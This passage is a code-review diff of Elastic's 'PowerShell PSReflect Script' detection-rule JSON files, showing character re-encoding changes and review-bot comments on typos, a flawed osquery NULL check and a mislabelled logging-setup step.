b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_106.json 
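Review bot: The rewritten `setup` string on the `+` line still carries the doubled word in `Steps to implement the logging policy with with Advanced Audit Configuration:`, and the path it introduces (`Computer Configuration > Administrative Templates > Windows PowerShell > Turn on PowerShell Script Block Logging`) is a Group Policy administrative template rather than part of Advanced Audit Policy Configuration, so the heading appears to mislabel where the setting lives; suggest `Steps to implement the logging policy via Group Policy:`. The registry fallback `reg add ... /v EnableScriptBlockLogging /t REG_DWORD /d 1` has no `/f`, so it will prompt for confirmation when the value already exists and stall a scripted rollout; adding `/f` makes it idempotent. The identical string appears in the `_106` and `_107` copies of this rule later in the diff, and since these JSON files are generated from the detection-rules repository the correction should land upstream rather than here.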
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell PSReflect Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, 
description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware 
backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, 
user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", 
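Review bot: The embedded osquery "Retrieve Services Running on User Accounts" query on the added `note` line filters with `user_account == null`, which in SQLite compares against NULL and evaluates to NULL rather than true or false; under three-valued logic `FALSE OR NULL` is NULL and `NOT NULL` is NULL, so every service with a real user account name is filtered out together with the NULL rows and the query appears to return nothing (worth confirming against the osquery SQLite build). The fix is `... OR user_account IS NULL)` in the query text. Separately, the step "searching for login events (for example, 4624) to the target host after the registry modification" looks copied from a registry-focused guide—this rule fires on PowerShell script block text, so "after the script execution" would be accurate—and "The script content that may be split into multiple script blocks" should read "The script content may be split into multiple script blocks". Since this file is generated from detection-rules, these belong in the upstream TOML.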
@@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_107.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_107.json index 034f8a3986e..0ab82796bef 100644 --- a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_107.json +++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_107.json 
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell PSReflect Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, 
description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware 
backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, 
user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", 
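Review bot: The "Retrieve Services Running on User Accounts" osquery embedded in the new `note` value uses `user_account == null`, and in SQLite a comparison with NULL yields NULL, so the surrounding `NOT (... OR user_account == null)` collapses to NULL for any non-system account and the row is discarded; the query should use `user_account IS NULL` to actually return services running under user accounts (confirm against the osquery SQLite build, but this is standard three-valued logic). The same `+` line keeps the wording "after the registry modification" in the account-compromise step, which does not match a rule keyed on `powershell.file.script_block_text`; "after the script execution" reads correctly. The sentence "The script content that may be split into multiple script blocks" also has a stray "that". As this JSON is generated from the detection-rules repository, the corrections should be made there so they propagate to every version of the rule.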
@@ -51,7 +51,7 @@
 ],
 "risk_score": 47,
 "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_108.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_108.json
index 6f663470b10..41ba175a01f 100644
--- a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_108.json
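Review bot: The new-side `setup` string still carries a doubled word in `Steps to implement the logging policy with with Advanced Audit Configuration:`; it should read `Steps to implement the logging policy with Advanced Audit Configuration:`. The identical string is carried into the `56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_108.json` and `_109.json` setup hunks further down, so the same one-word fix applies there. Since the only change in this hunk is re-encoding `\u003e` as `>`, the text itself was presumably copied from the rule source; if so, correcting it there is the durable fix.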
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell PSReflect Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, 
description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and 